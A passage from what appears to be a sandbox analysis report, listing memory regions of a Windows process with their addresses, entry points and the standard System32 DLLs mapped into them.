1383 start_va = 0x7fef5000000 end_va = 0x7fef5020fff monitored = 0 entry_point = 0x7fef50103b0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1384 start_va = 0x7fef5030000 end_va = 0x7fef509afff monitored = 0 entry_point = 0x7fef5074344 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 1385 start_va = 0x7fef50a0000 end_va = 0x7fef50b2fff monitored = 0 entry_point = 0x7fef50a1d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1386 start_va = 0x7fef50c0000 end_va = 0x7fef5121fff monitored = 0 entry_point = 0x7fef50fbd80 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 1387 start_va = 0x7fef5130000 end_va = 0x7fef525bfff monitored = 0 entry_point = 0x7fef51e0ef0 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 1388 start_va = 0x7fef5260000 end_va = 0x7fef5279fff monitored = 0 entry_point = 0x7fef5273fbc region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 1389 start_va = 0x7fef5280000 end_va = 0x7fef5303fff monitored = 0 entry_point = 0x7fef52d1118 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 1390 start_va = 0x7fef5310000 end_va = 0x7fef531dfff monitored = 0 entry_point = 0x7fef5315500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1391 start_va = 0x7fef5320000 end_va = 0x7fef5346fff monitored = 0 entry_point = 0x7fef53211a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 1392 start_va = 0x7fef5350000 end_va = 0x7fef5422fff monitored = 0 entry_point = 0x7fef53c8b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1393 start_va = 0x7fef5470000 end_va = 0x7fef5488fff monitored = 0 entry_point = 0x7fef5471104 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 1394 start_va = 0x7fef5490000 end_va = 0x7fef54dffff monitored = 0 entry_point = 0x7fef5491190 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 1395 start_va = 0x7fef54e0000 end_va = 0x7fef54e7fff monitored = 0 entry_point = 0x7fef54e1020 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 1396 start_va = 0x7fef54f0000 end_va = 0x7fef5514fff monitored = 0 entry_point = 0x7fef5508c54 region_type = mapped_file name = "browser.dll" filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll") Region: id = 1397 start_va = 0x7fef5520000 end_va = 0x7fef555cfff monitored = 0 entry_point = 0x7fef5521070 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 1398 start_va = 0x7fef5560000 end_va = 0x7fef55a6fff monitored = 0 entry_point = 0x7fef5561040 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 1399 start_va = 0x7fef55b0000 end_va = 0x7fef55f1fff monitored = 0 entry_point = 0x7fef55b17e4 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 1400 start_va = 0x7fef5600000 end_va = 0x7fef5610fff monitored = 0 entry_point = 0x7fef56014c0 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1401 start_va = 0x7fef5620000 end_va = 0x7fef56b1fff monitored = 0 entry_point = 0x7fef56951ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 1402 start_va = 0x7fef56c0000 end_va = 0x7fef5736fff monitored = 0 entry_point = 0x7fef56fe7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 1403 start_va = 0x7fef5740000 end_va = 0x7fef5779fff monitored = 0 entry_point = 0x7fef575d020 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 1404 start_va = 0x7fef5960000 end_va = 0x7fef5970fff monitored = 0 entry_point = 0x7fef5969e7c region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 1405 start_va = 0x7fef5a10000 end_va = 0x7fef5a73fff monitored = 0 entry_point = 0x7fef5a11254 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1406 start_va = 0x7fef5a80000 end_va = 0x7fef5af0fff monitored = 0 entry_point = 0x7fef5a81010 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1407 start_va = 0x7fef5b90000 end_va = 0x7fef5ba6fff monitored = 0 entry_point = 0x7fef5b91060 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1408 start_va = 0x7fef5bb0000 end_va = 0x7fef5d5ffff monitored = 0 entry_point = 0x7fef5bb1010 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1409 start_va = 0x7fef6a50000 end_va = 0x7fef6ac3fff monitored = 0 entry_point = 0x7fef6a566f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1410 start_va = 0x7fef7f60000 end_va = 0x7fef7f7afff monitored = 0 entry_point = 0x7fef7f61198 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 1411 start_va = 0x7fef8080000 end_va = 0x7fef8088fff monitored = 0 entry_point = 0x7fef80811a0 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 1412 start_va = 0x7fef8210000 end_va = 0x7fef82e1fff monitored = 0 entry_point = 0x7fef82a1a10 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 1413 start_va = 0x7fef8360000 end_va = 0x7fef8376fff monitored = 0 entry_point = 0x7fef8369d50 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 1414 start_va = 0x7fef89f0000 end_va = 0x7fef8a6bfff monitored = 0 entry_point = 0x7fef89f11d4 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 1415 start_va = 0x7fef8d20000 end_va = 0x7fef8d96fff monitored = 0 entry_point = 0x7fef8d2afd0 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 1416 start_va = 0x7fef8df0000 end_va = 0x7fef8eddfff monitored = 0 entry_point = 0x7fef8df12a0 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1417 start_va = 0x7fef8ee0000 end_va = 0x7fef8ee9fff monitored = 0 entry_point = 0x7fef8ee260c region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 1418 start_va = 0x7fef8ef0000 end_va = 0x7fef9001fff monitored = 0 entry_point = 0x7fef8f0f354 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 1419 start_va = 0x7fef9010000 end_va = 0x7fef901efff monitored = 0 entry_point = 0x7fef9017e80 region_type = mapped_file name = "wiarpc.dll" filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll") Region: id = 1420 start_va = 0x7fef9020000 end_va = 0x7fef9028fff monitored = 0 entry_point = 0x7fef9023668 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 1421 start_va = 0x7fef9030000 end_va = 0x7fef9038fff monitored = 0 entry_point = 0x7fef9031020 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 1422 start_va = 0x7fef9040000 end_va = 0x7fef9095fff monitored = 0 entry_point = 0x7fef9041040 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 1423 start_va = 0x7fef90a0000 end_va = 0x7fef90fdfff monitored = 0 entry_point = 0x7fef90a9024 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 1424 start_va = 0x7fef9100000 end_va = 0x7fef9117fff monitored = 0 entry_point = 0x7fef9101bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1425 start_va = 0x7fef9120000 end_va = 0x7fef9130fff monitored = 0 entry_point = 0x7fef91216ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1426 start_va = 0x7fef9150000 end_va = 0x7fef91a2fff monitored = 0 entry_point = 0x7fef9152b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1427 start_va = 0x7fef91b0000 end_va = 0x7fef91befff monitored = 0 entry_point = 0x7fef91b9a48 region_type = mapped_file name = "mspatcha.dll" filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll") Region: id = 1428 start_va = 0x7fef91c0000 end_va = 0x7fef91c9fff monitored = 0 entry_point = 0x7fef91c3994 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 1429 start_va = 0x7fef98b0000 end_va = 0x7fef98f1fff monitored = 0 entry_point = 0x7fef98e0048 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 1430 start_va = 0x7fef9900000 end_va = 0x7fef9919fff monitored = 0 entry_point = 0x7fef9911ae4 region_type = mapped_file name = "rascfg.dll" filename = "\\Windows\\System32\\rascfg.dll" (normalized: "c:\\windows\\system32\\rascfg.dll") Region: id = 1431 start_va = 0x7fef9940000 end_va = 0x7fef994efff monitored = 0 entry_point = 0x7fef9946894 region_type = mapped_file name = "ndiscapcfg.dll" filename = "\\Windows\\System32\\ndiscapCfg.dll" (normalized: "c:\\windows\\system32\\ndiscapcfg.dll") Region: id = 1432 start_va = 0x7fefb210000 end_va = 0x7fefb223fff monitored = 0 entry_point = 0x7fefb213e64 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 1433 start_va = 0x7fefb230000 end_va = 0x7fefb23afff monitored = 0 entry_point = 0x7fefb231198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1434 start_va = 0x7fefb240000 end_va = 0x7fefb266fff monitored = 0 entry_point = 0x7fefb2498bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1435 start_va = 0x7fefb270000 end_va = 0x7fefb2d6fff monitored = 0 entry_point = 0x7fefb286060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1436 start_va = 0x7fefb2f0000 end_va = 0x7fefb2fafff monitored = 0 entry_point = 0x7fefb2f4f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 1437 start_va = 0x7fefb300000 end_va = 0x7fefb30bfff monitored = 0 entry_point = 0x7fefb3015d8 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1438 start_va = 0x7fefb310000 end_va = 0x7fefb31ffff monitored = 0 entry_point = 0x7fefb31835c region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 1439 start_va = 0x7fefb320000 end_va = 0x7fefb338fff monitored = 0 entry_point = 0x7fefb3211a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1440 start_va = 0x7fefb340000 end_va = 0x7fefb376fff monitored = 0 entry_point = 0x7fefb348424 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 1441 start_va = 0x7fefb3c0000 end_va = 0x7fefb3d4fff monitored = 0 entry_point = 0x7fefb3c60d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1442 start_va = 0x7fefb3e0000 end_va = 0x7fefb4a1fff monitored = 0 entry_point = 0x7fefb3e101c region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 1443 start_va = 0x7fefb6e0000 end_va = 0x7fefb6e8fff monitored = 0 entry_point = 0x7fefb6e1010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 1444 start_va = 0x7fefb920000 end_va = 0x7fefb933fff monitored = 0 entry_point = 0x7fefb9216b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1445 start_va = 0x7fefb940000 end_va = 0x7fefb954fff monitored = 0 entry_point = 0x7fefb941050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1446 start_va = 0x7fefb960000 end_va = 0x7fefb96bfff monitored = 0 entry_point = 0x7fefb9618a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1447 start_va = 0x7fefb970000 end_va = 0x7fefb985fff monitored = 0 entry_point = 0x7fefb9711a0 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1448 start_va = 0x7fefbaa0000 end_va = 0x7fefbab0fff monitored = 0 entry_point = 0x7fefbaa1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1449 start_va = 0x7fefbc00000 end_va = 0x7fefbc34fff monitored = 0 entry_point = 0x7fefbc01064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1450 start_va = 0x7fefc070000 end_va = 0x7fefc0c5fff monitored = 0 entry_point = 0x7fefc07bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1451 start_va = 0x7fefc0d0000 end_va = 0x7fefc1fbfff monitored = 0 entry_point = 0x7fefc0d94bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1452 start_va = 0x7fefc200000 end_va = 0x7fefc21cfff monitored = 0 entry_point = 0x7fefc201ef4 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1453 start_va = 0x7fefc250000 end_va = 0x7fefc443fff monitored = 0 entry_point = 0x7fefc3dc924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 1454 start_va = 0x7fefc740000 end_va = 0x7fefc76cfff monitored = 0 entry_point = 0x7fefc741010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1455 start_va = 0x7fefc910000 end_va = 0x7fefc91bfff monitored = 0 entry_point = 0x7fefc911064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1456 start_va = 0x7fefc920000 end_va = 0x7fefc9dafff monitored = 0 entry_point = 0x7fefc926de0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1457 start_va = 0x7fefc9e0000 end_va = 0x7fefc9e6fff monitored = 0 entry_point = 0x7fefc9e14b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1458 start_va = 0x7fefcad0000 end_va = 0x7fefcaeafff monitored = 0 entry_point = 0x7fefcad2068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1459 start_va = 0x7fefcaf0000 end_va = 0x7fefcb0dfff monitored = 0 entry_point = 0x7fefcaf13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1460 start_va = 0x7fefcb10000 end_va = 0x7fefcb21fff monitored = 0 entry_point = 0x7fefcb11060 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 1461 start_va = 0x7fefcb30000 end_va = 0x7fefcb4efff monitored = 0 entry_point = 0x7fefcb35c68 region_type = mapped_file name = "spinf.dll" filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll") Region: id = 1462 start_va = 0x7fefcc00000 end_va = 0x7fefcc38fff monitored = 0 entry_point = 0x7fefcc0c0f0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 1463 start_va = 0x7fefcc40000 end_va = 0x7fefcc49fff monitored = 0 entry_point = 0x7fefcc43cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1464 start_va = 0x7fefcc50000 end_va = 0x7fefcc5cfff monitored = 0 entry_point = 0x7fefcc51348 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 1465 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1466 start_va = 0x7fefce30000 end_va = 0x7fefce5ffff monitored = 0 entry_point = 0x7fefce3194c region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1467 start_va = 0x7fefce60000 end_va = 0x7fefcebafff monitored = 0 entry_point = 0x7fefce66940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1468 start_va = 0x7fefcfd0000 end_va = 0x7fefcfd6fff monitored = 0 entry_point = 0x7fefcfd142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1469 start_va = 0x7fefcfe0000 end_va = 0x7fefd034fff monitored = 0 entry_point = 0x7fefcfe1054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1470 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1471 start_va = 0x7fefd150000 end_va = 0x7fefd181fff monitored = 0 entry_point = 0x7fefd15144c region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 1472 start_va = 0x7fefd190000 end_va = 0x7fefd1b1fff monitored = 0 entry_point = 0x7fefd195d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1473 start_va = 0x7fefd210000 end_va = 0x7fefd23efff monitored = 0 entry_point = 0x7fefd211064 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1474 start_va = 0x7fefd250000 end_va = 0x7fefd2bcfff monitored = 0 entry_point = 0x7fefd251010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1475 start_va = 0x7fefd2c0000 end_va = 0x7fefd2d3fff monitored = 0 entry_point = 0x7fefd2c4160 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 1476 start_va = 0x7fefd520000 end_va = 0x7fefd527fff monitored = 0 entry_point = 0x7fefd522a6c region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 1477 start_va = 0x7fefd530000 end_va = 0x7fefd539fff monitored = 0 entry_point = 0x7fefd533b40 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 1478 start_va = 0x7fefd540000 end_va = 0x7fefd562fff monitored = 0 entry_point = 0x7fefd541198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1479 start_va = 0x7fefd5e0000 end_va = 0x7fefd5eafff monitored = 0 entry_point = 0x7fefd5e1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1480 start_va = 0x7fefd610000 end_va = 0x7fefd634fff monitored = 0 entry_point = 0x7fefd619658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1481 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1482 start_va = 0x7fefd650000 end_va = 0x7fefd6e0fff monitored = 0 entry_point = 0x7fefd651440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1483 start_va = 0x7fefd6f0000 end_va = 0x7fefd72cfff monitored = 0 entry_point = 0x7fefd6f18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1484 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1485 start_va = 0x7fefd750000 end_va = 0x7fefd75efff monitored = 0 entry_point = 0x7fefd7519b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1486 start_va = 0x7fefd7f0000 end_va = 0x7fefd7fefff monitored = 0 entry_point = 0x7fefd7f1020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1487 start_va = 0x7fefd800000 end_va = 0x7fefd96cfff monitored = 0 entry_point = 0x7fefd8010b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1488 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1489 start_va = 0x7fefd9e0000 end_va = 0x7fefda1afff monitored = 0 entry_point = 0x7fefd9e1324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1490 start_va = 0x7fefda20000 end_va = 0x7fefda55fff monitored = 0 entry_point = 0x7fefda21474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1491 start_va = 0x7fefda60000 end_va = 0x7fefda79fff monitored = 0 entry_point = 0x7fefda61558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1492 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1493 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1494 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1495 start_va = 0x7fefdee0000 end_va = 0x7fefec67fff monitored = 0 entry_point = 0x7fefdf5cebc region_type = 